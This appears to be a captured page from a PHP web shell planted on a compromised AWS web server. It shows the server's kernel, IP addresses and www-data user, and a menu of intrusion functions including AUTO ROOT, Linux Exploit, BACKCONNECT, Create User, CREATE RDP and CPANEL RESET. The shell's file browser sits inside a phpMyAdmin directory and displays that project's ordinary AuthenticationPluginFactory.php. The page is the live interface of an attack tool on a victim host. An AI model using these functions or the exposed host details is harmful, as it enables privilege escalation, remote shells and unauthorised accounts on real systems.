Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.147.79.7
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
Plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxr-xr-x
Export
[ DIR ]
drwxr-xr-x
Import
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
Transformations
[ DIR ]
drwxr-xr-x
TwoFactor
[ DIR ]
drwxr-xr-x
AuthenticationPlugin.php
10.08
KB
-rw-r--r--
AuthenticationPluginFactory.ph...
1.05
KB
-rw-r--r--
ExportPlugin.php
10.17
KB
-rw-r--r--
IOTransformationsPlugin.php
1.94
KB
-rw-r--r--
ImportPlugin.php
1.57
KB
-rw-r--r--
SchemaPlugin.php
2.53
KB
-rw-r--r--
TransformationsInterface.php
1.39
KB
-rw-r--r--
TransformationsPlugin.php
1.18
KB
-rw-r--r--
TwoFactorPlugin.php
3.49
KB
-rw-r--r--
UploadInterface.php
551
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AuthenticationPluginFactory.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Plugins; use PhpMyAdmin\Config; use PhpMyAdmin\Exceptions\AuthenticationPluginException; use function __; use function class_exists; use function is_subclass_of; use function strtolower; use function ucfirst; class AuthenticationPluginFactory { private AuthenticationPlugin|null $plugin = null; /** @throws AuthenticationPluginException */ public function create(): AuthenticationPlugin { if ($this->plugin instanceof AuthenticationPlugin) { return $this->plugin; } $authType = Config::getInstance()->selectedServer['auth_type']; $class = 'PhpMyAdmin\\Plugins\\Auth\\Authentication' . ucfirst(strtolower($authType)); if (! class_exists($class) || ! is_subclass_of($class, AuthenticationPlugin::class)) { throw new AuthenticationPluginException( __('Invalid authentication method set in configuration:') . ' ' . $authType, ); } $this->plugin = new $class(); return $this->plugin; } }
Close